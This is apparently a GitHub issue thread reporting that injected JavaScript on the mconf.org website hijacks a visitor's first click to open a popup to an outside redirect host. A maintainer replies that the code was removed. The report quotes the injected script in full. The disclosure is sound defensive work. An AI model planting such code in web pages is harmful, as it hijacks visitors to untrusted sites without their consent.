### ISSUE TITLE
mconf.org web site has a javascript hack 

### ISSUE THREAD

**Issue by mwyvr** [mconf/mconf-web#960]
The following code is on your main project site http://mconf.org/

```javascript
var t = false;
document.onclick= function(event) {
if (t) {
return;
}
t = true;
  if ( event === undefined) event= window.event;
  var target= 'target' in event? event.target : event.srcElement;
  var win = window.open('http://p2.wncit.com/css/', '_blank');
  win.focus();
};
 ```

The url issues a redirect to a random server... sites you probably do not wish to be associated with.

Couldn't find a github project for your website so am reporting it here. 

Cheers
Mike

**Comment by daronco** [comment]
Hi Mike,

Thank you for the report. We're not sure yet what happened, but we removed the code and we'll investigate further.

Thanks.
